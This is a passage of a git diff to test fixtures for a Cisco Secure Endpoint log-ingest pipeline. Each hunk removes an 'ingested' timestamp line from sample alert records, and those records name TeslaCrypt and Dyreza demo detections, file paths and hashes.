"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3645,7 +3606,6 @@ ], "code": "1107296272", "id": "1489955900291000600", - "ingested": "2022-02-02T05:52:24.688979610Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "severity": 3, @@ -3725,7 +3685,6 @@ ], "code": "1090519054", "id": "6159251516445164000", - "ingested": "2022-02-02T05:52:24.688980421Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -3805,7 +3764,6 @@ ], "code": "1090519054", "id": "6159251516445164000", - "ingested": "2022-02-02T05:52:24.688981235Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index eed930aea2e..343f1803e43 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -44,7 +44,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422872327Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -124,7 +123,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422874903Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -208,7 +206,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422875934Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -292,7 +289,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422876794Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -376,7 +372,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422877648Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -460,7 +455,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422878465Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -544,7 +538,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422879320Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -628,7 +621,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422880138Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -712,7 +704,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422880952Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -796,7 +787,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422881765Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -880,7 +870,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422882597Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -964,7 +953,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422883705Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1048,7 +1036,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422884705Z", "kind": "alert", "original": 